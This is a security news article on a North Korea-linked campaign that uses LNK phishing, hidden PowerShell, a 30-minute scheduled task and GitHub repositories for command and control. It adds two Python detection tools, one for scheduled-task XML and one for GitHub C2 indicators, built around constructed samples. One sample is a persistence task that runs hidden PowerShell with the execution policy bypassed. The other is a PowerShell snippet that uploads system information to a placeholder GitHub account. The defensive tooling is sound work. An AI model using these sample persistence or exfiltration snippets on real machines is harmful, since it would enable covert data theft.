Threat actors believed to be linked to the Democratic People’s Republic of Korea (DPRK) are leveraging GitHub as a command-and-control (C&C) platform in a multi-stage campaign targeting organizations in South Korea, researchers at Fortinet FortiGuard Labs said.
The attack begins with phishing emails carrying malicious Windows shortcut (LNK) files. Once opened, the LNK displays a decoy PDF to distract the victim while silently executing a hidden PowerShell script. The script first runs a series of anti-analysis checks, looking for indicators of virtual machines, debuggers, or forensic tools; if any are found, it exits immediately to avoid detection.
If the system passes the checks, the script proceeds to extract a secondary Visual Basic Script (VBScript) and establishes persistence by creating a scheduled task. The task ensures the malicious PowerShell payload is executed every 30 minutes in a hidden window, allowing it to survive system reboots and evade detection.
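The persistence step above is the kind of thing a responder can hunt for offline, since every scheduled task is stored as an XML file under C:\Windows\System32\Tasks. The following is an added example, not code from the Fortinet report or from the malware: a small triage routine that parses a task XML export, pulls out the Exec action and any repetition interval, and flags the combination the report describes (a script host launched with a hidden window on a short repeating schedule). The two task files are constructed samples, the list of script hosts and the one-hour interval threshold are assumptions, and the findings are heuristic, so treat a hit as a lead rather than a verdict.

```python
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field
from typing import List, Optional, Union

# Namespace used by every Task Scheduler XML file under C:\Windows\System32\Tasks
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Task Scheduler writes repetition intervals as ISO 8601 durations, e.g. PT30M
ISO_DURATION = re.compile(r"^P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")

# Interpreters an attacker typically hides behind (assumed list; extend as needed)
SCRIPT_HOSTS = re.compile(r"(?i)^(powershell|pwsh|wscript|cscript|mshta)(\.exe)?$")


def parse_iso_duration(value: str) -> Optional[int]:
    """Convert an ISO 8601 duration such as PT30M or P1DT2H into seconds."""
    m = ISO_DURATION.match(value.strip())
    if not m:
        return None
    days, hours, minutes, seconds = (int(x) if x else 0 for x in m.groups())
    return days * 86400 + hours * 3600 + minutes * 60 + seconds


@dataclass
class TaskFinding:
    command: str
    arguments: str
    interval_seconds: Optional[int]
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # One indicator alone (e.g. a repeating PowerShell task) is common in admin tooling;
        # two or more is worth an analyst's time. Threshold is an assumption.
        return len(self.reasons) >= 2


def triage_task_xml(task_xml: Union[bytes, str]) -> Optional[TaskFinding]:
    """Triage the first Exec action of a task XML; return None if the task has none.

    Accepts raw bytes (on-disk task files are UTF-16 with a BOM, which the XML
    parser handles itself) or an already decoded string.
    """
    root = ET.fromstring(task_xml)
    exec_node = root.find("t:Actions/t:Exec", NS)
    if exec_node is None:
        return None
    command = exec_node.findtext("t:Command", default="", namespaces=NS).strip()
    arguments = exec_node.findtext("t:Arguments", default="", namespaces=NS).strip()

    # Any trigger type may carry a <Repetition>; take the shortest interval found
    intervals = [
        parse_iso_duration(node.text or "")
        for node in root.findall("t:Triggers/*/t:Repetition/t:Interval", NS)
    ]
    intervals = [i for i in intervals if i is not None]
    interval = min(intervals) if intervals else None

    reasons: List[str] = []
    exe = command.strip('"').rsplit("\\", 1)[-1]
    if SCRIPT_HOSTS.search(exe):
        reasons.append(f"action launches a script host ({exe})")
    if re.search(r"(?i)-w(?:indowstyle)?\s+hidden", arguments):
        reasons.append("PowerShell started with a hidden window")
    if re.search(r"(?i)-(?:ep|executionpolicy)\s+bypass", arguments):
        reasons.append("execution policy bypassed")
    if re.search(r"(?i)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", arguments):
        reasons.append("encoded command payload")
    if interval is not None and interval <= 3600:
        reasons.append(f"repeats every {interval // 60} minutes")
    if root.findtext("t:Settings/t:Hidden", default="false", namespaces=NS).lower() == "true":
        reasons.append("task hidden from the Task Scheduler UI")
    return TaskFinding(command, arguments, interval, reasons)


# Constructed sample (not a real task file): a persistence task that runs a hidden
# PowerShell payload every 30 minutes, matching the behaviour the report describes.
SUSPICIOUS_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT30M</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
      <StartBoundary>2024-01-01T00:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command>
      <Arguments>-WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\Public\update.ps1</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign sample: a nightly backup job with no repetition interval.
BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2024-01-01T03:00:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Program Files\Backup\backup.exe</Command>
      <Arguments>--nightly</Arguments>
    </Exec>
  </Actions>
</Task>"""


if __name__ == "__main__":
    for name, xml in (("suspicious", SUSPICIOUS_TASK), ("benign", BENIGN_TASK)):
        finding = triage_task_xml(xml)
        print(name, "->", "SUSPICIOUS" if finding.suspicious else "ok", finding.reasons)
```

To run this against a live host, feed it the bytes of each file under C:\Windows\System32\Tasks (or the output of `schtasks /query /xml`); the XML declaration and UTF-16 BOM in those files are handled by the parser when you pass bytes rather than a decoded string.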
The malware then profiles the infected machine, collecting system data and storing it in a log file. The information is exfiltrated to a GitHub repository controlled by the attackers, specifically under an account named “motoralis,” using a hard-coded access token. Researchers found several additional GitHub accounts linked to the campaign, including “God0808RAMA,” “Pigresy80,” “entire73,” “pandora0009,” and “brandonleeodd93-blip.”
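Because the implant authenticates to GitHub with a hard-coded token, the script itself carries the indicators an analyst needs: the token, the account and repository it writes to, and the fact that it writes rather than reads. The following is an added example, not code from the report or the malware: a scanner that pulls those indicators out of a recovered PowerShell payload, redacts the token so it can be shared in a ticket, and classifies the access pattern. The PowerShell sample is constructed (its token is a placeholder string of A's and "example-owner" is a made-up account, not one of the accounts named above), and the token formats and the verdict rules are assumptions that fit GitHub's documented token prefixes.

```python
import re
from typing import Dict, List, Tuple

# GitHub token formats: classic/OAuth/app tokens are a 3-letter prefix plus 36 chars;
# fine-grained PATs are github_pat_ plus 22 chars, an underscore and 59 chars.
TOKEN_RE = re.compile(
    r"\b(?:gh[pousr]_[A-Za-z0-9]{36}|github_pat_[A-Za-z0-9]{22}_[A-Za-z0-9]{59})\b"
)
# Contents API calls reveal the account, repository and file path being read or written
CONTENTS_RE = re.compile(
    r"https://api\.github\.com/repos/([\w.-]+)/([\w.-]+)/contents/([^\s\"'?]+)"
)
RAW_RE = re.compile(r"https://raw\.githubusercontent\.com/([\w.-]+)/([\w.-]+)/")
AUTH_RE = re.compile(r"(?i)authorization\s*[=:]\s*[\"']?\s*(?:token|bearer)\b")
# Invoke-RestMethod/Invoke-WebRequest with PUT or POST means the script writes to the repo
WRITE_RE = re.compile(r"(?i)-Method\s+(?:Put|Post)\b")


def redact(token: str) -> str:
    """Keep prefix and last four characters so findings correlate without leaking the secret."""
    return token[:4] + "*" * (len(token) - 8) + token[-4:]


def scan_script(text: str) -> Dict[str, object]:
    """Extract GitHub C2 indicators from script text."""
    tokens = [redact(t) for t in TOKEN_RE.findall(text)]
    endpoints: List[Tuple[str, str, str]] = list(CONTENTS_RE.findall(text))
    endpoints += [(owner, repo, "") for owner, repo in RAW_RE.findall(text)]
    accounts = sorted({owner for owner, _, _ in endpoints})
    return {
        "tokens": tokens,
        "endpoints": endpoints,
        "accounts": accounts,
        "auth_header": bool(AUTH_RE.search(text)),
        "writes": bool(WRITE_RE.search(text)),
    }


def verdict(findings: Dict[str, object]) -> str:
    """Rank the access pattern; rules are an assumption, tune them to your environment."""
    if findings["tokens"] and findings["writes"]:
        return "likely GitHub C2: hard-coded token used to write to a repository"
    if findings["tokens"] or (findings["endpoints"] and findings["auth_header"]):
        return "suspicious: authenticated GitHub API access from a script"
    if findings["endpoints"]:
        return "review: unauthenticated GitHub fetch (could be benign tooling)"
    return "no GitHub indicators"


# Constructed sample payload: profiles the host and uploads the log via the Contents API.
FAKE_TOKEN = "ghp_" + "A" * 36  # placeholder, not a real credential
SAMPLE_SCRIPT = f"""
$log = "$env:TEMP\\sysinfo.log"
systeminfo | Out-File $log
$token = "{FAKE_TOKEN}"
$headers = @{{ Authorization = "token $token"; "User-Agent" = "Mozilla/5.0" }}
$content = [Convert]::ToBase64String([IO.File]::ReadAllBytes($log))
$body = @{{ message = "upload"; content = $content }} | ConvertTo-Json
Invoke-RestMethod -Uri "https://api.github.com/repos/example-owner/logs/contents/$env:COMPUTERNAME.log" -Method Put -Headers $headers -Body $body
"""


if __name__ == "__main__":
    result = scan_script(SAMPLE_SCRIPT)
    for key, value in result.items():
        print(f"{key}: {value}")
    print(verdict(result))
```

The redacted token is still enough to revoke: report the prefix and suffix to GitHub, who can match it against issued tokens. On the network side, the same activity shows up as powershell.exe making PUT requests to api.github.com, which is a useful proxy-log hunt even when the script itself is not recovered.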
Researchers note that previous versions of the campaign distributed malware such as Xeno RAT. The activities have been attributed to the North Korean state-sponsored hacking group Kimsuky, known for targeting South Korean entities.
Last week, AhnLab SEcurity intelligence Center (ASEC) said it observed a change in Kimsuky’s method of distributing malicious LNK files. The overall attack flow remains largely the same, with a malicious LNK ultimately executing a Python-based backdoor or downloader.